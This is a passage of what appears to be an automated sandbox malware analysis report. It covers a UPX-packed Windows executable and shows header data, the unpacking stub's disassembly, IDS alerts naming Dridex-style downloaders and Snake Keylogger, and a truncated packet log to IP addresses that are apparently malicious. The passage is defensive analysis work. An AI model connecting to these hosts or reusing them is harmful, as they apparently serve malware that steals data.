                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:be19e18d6a8b41631d40059031a928bb

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            pushad
                                                                            mov esi, 00406000h
                                                                            lea edi, dword ptr [esi-00005000h]
                                                                            push edi
                                                                            or ebp, FFFFFFFFh
                                                                            jmp 00007F3668AD3592h
                                                                            nop
                                                                            nop
                                                                            nop
                                                                            nop
                                                                            nop
                                                                            nop
                                                                            mov al, byte ptr [esi]
                                                                            inc esi
                                                                            mov byte ptr [edi], al
                                                                            inc edi
                                                                            add ebx, ebx
                                                                            jne 00007F3668AD3589h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jc 00007F3668AD356Fh
                                                                            mov eax, 00000001h
                                                                            add ebx, ebx
                                                                            jne 00007F3668AD3589h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc eax, eax
                                                                            add ebx, ebx
                                                                            jnc 00007F3668AD3571h
                                                                            jne 00007F3668AD358Bh
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jnc 00007F3668AD3566h
                                                                            xor ecx, ecx
                                                                            sub eax, 03h
                                                                            jc 00007F3668AD358Fh
                                                                            shl eax, 08h
                                                                            mov al, byte ptr [esi]
                                                                            inc esi
                                                                            xor eax, FFFFFFFFh
                                                                            je 00007F3668AD35F6h
                                                                            mov ebp, eax
                                                                            add ebx, ebx
                                                                            jne 00007F3668AD3589h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc ecx, ecx
                                                                            add ebx, ebx
                                                                            jne 00007F3668AD3589h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc ecx, ecx
                                                                            jne 00007F3668AD35A2h
                                                                            inc ecx
                                                                            add ebx, ebx
                                                                            jne 00007F3668AD3589h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc ecx, ecx
                                                                            add ebx, ebx
                                                                            jnc 00007F3668AD3571h
                                                                            jne 00007F3668AD358Bh
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jnc 00007F3668AD3566h
                                                                            add ecx, 02h
                                                                            cmp ebp, FFFFF300h
                                                                            adc ecx, 01h
                                                                            lea edx, dword ptr [edi+ebp]
                                                                            cmp ebp, FFFFFFFCh
                                                                            jbe 00007F3668AD3591h
                                                                            mov al, byte ptr [edx]
                                                                            inc edx
                                                                            mov byte ptr [edi], al
                                                                            inc edi
                                                                            dec ecx
                                                                            jne 00007F3668AD3579h
                                                                            jmp 00007F3668AD34E8h
                                                                            nop
                                                                            mov eax, dword ptr [edx]
                                                                            add edx, 04h
                                                                            mov dword ptr [edi], eax
                                                                            add edi, 04h
                                                                            sub ecx, 00000000h

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x78d00xd4.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x70000x8d0.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            UPX00x10000x50000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            UPX10x60000x10000xc000a0e4af6bf1b82abadde6acd6f70f4f8False0.947265625data7.544656426324873IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x70000x10000xa00992fe5323d933253ef0f2962583f7f0eFalse0.53515625data4.250073082882718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            SETTINGS0x41480x1deempty0
                                                                            RT_ICON0x714c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 3200.6213872832369942
                                                                            RT_GROUP_ICON0x76b80x14data1.1
                                                                            RT_VERSION0x76d00x200Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970EnglishUnited States0.513671875

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                                            MSVBVM60.DLL

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-01-02T20:34:49.438746+01002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:49.438746+01002021245ET MALWARE Possible Dridex Download URI Struct with no referer1192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:49.438746+01002022550ET MALWARE Possible Malicious Macro DL EXE Feb 20161192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:50.154331+01002800029ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass147.254.187.7280192.168.2.449730TCP
                                                                            2025-01-02T20:34:50.703531+01002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:50.703531+01002021245ET MALWARE Possible Dridex Download URI Struct with no referer1192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:50.703531+01002022550ET MALWARE Possible Malicious Macro DL EXE Feb 20161192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:54.702088+01002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:54.702088+01002021245ET MALWARE Possible Dridex Download URI Struct with no referer1192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:54.702088+01002022550ET MALWARE Possible Malicious Macro DL EXE Feb 20161192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:55.222987+01002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:55.222987+01002021245ET MALWARE Possible Dridex Download URI Struct with no referer1192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:55.222987+01002022550ET MALWARE Possible Malicious Macro DL EXE Feb 20161192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:56.526033+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.44973047.254.187.7280TCP
                                                                            2025-01-02T20:34:59.703337+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.44973869.42.215.25280TCP
                                                                            2025-01-02T20:35:00.259871+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974047.254.187.7280TCP
                                                                            2025-01-02T20:35:01.530652+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974047.254.187.7280TCP
                                                                            2025-01-02T20:35:02.093483+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974047.254.187.7280TCP
                                                                            2025-01-02T20:35:58.898119+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449845142.250.186.142443TCP
                                                                            2025-01-02T20:36:02.093228+01002800781ETPRO EXPLOIT Microsoft Windows Shell Buffer Overflow147.254.187.7280192.168.2.449740TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 2, 2025 20:34:48.610282898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:48.615088940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:48.615190983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:48.615381002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:48.620106936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.438334942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.438352108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.438363075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.438374043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.438745975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.439729929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.439739943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.439794064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.439857960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.439868927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.439881086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.439901114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.439937115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.444519997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.444586992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.444614887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.444628000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.444639921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.444653988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.444674969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.444689989 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.449558973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.449574947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.449642897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.525232077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.525250912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.525278091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.525289059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.525327921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.525381088 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.529958010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.529982090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.529994011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.530004978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.530014992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.530023098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.530092955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.534658909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.534677982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.534688950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.534699917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.534707069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.534708977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.534720898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.534738064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.534786940 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.539422035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.539441109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.539452076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.539463997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.539470911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.539473057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.539491892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.539519072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.539560080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.544142962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.544166088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.544178963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.544189930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.544200897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.544200897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.544224024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.544270992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.577137947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.577152967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.577166080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.577195883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.577219009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.577261925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.611857891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.611875057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.611896038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.611907005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.611951113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.611984968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.616554976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.616597891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.616609097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.616616011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.616653919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.616697073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.621351004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.621373892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.621383905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.621391058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.621397972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.621408939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.621413946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.621414900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.621454000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.621478081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.626107931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.626126051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.626137972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.626148939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.626157045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.626159906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.626185894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.626224995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.630892992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.630911112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.630923033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.630934000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.630949020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.630981922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.635654926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.635685921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.635698080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.635710001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.635720968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.635731936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.635776997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.640398026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.640415907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.640460014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.640474081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.640487909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.640490055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.640499115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.640521049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.640542030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.645196915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.645231009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.645242929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.645255089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.645266056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.645287037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.645327091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.649995089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.650013924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.650026083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.650038004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.650049925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.650063992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.650067091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.650074005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.650082111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.650137901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.663886070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.663899899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.663945913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.663957119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.663957119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.663969040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.664005041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.664016008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.664207935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.664249897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.698792934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.698811054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.698823929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.698874950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.698910952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.698913097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.698925972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.698936939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.698950052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.698956013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.698965073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.698977947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.699001074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.699532032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.699554920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.699568033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.699577093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.699582100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.699589014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.699592113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.699611902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.699645042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.700401068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.700413942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.700426102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.700436115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.700447083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.700448036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.700470924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.700489998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.701160908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.701175928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.701186895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.701198101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.701199055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.701211929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.701231003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.701261044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.702038050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.702054024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.702073097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.702085018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.702086926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.702097893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.702121019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.702142954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.702907085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.702929020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.702940941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.702950954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.702963114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.702963114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.702982903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.703016043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.703635931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.703681946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.703684092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.703695059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.703722954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.703742981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.703756094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.703757048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.703778982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.703802109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.704484940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.704504013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.704515934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.704526901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.704541922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.704557896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.704986095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.705010891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.705023050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.705065012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.705321074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.705374956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.705471039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.705507040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.705682039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.705719948 CET4973080192.168.2.447.254.187.72
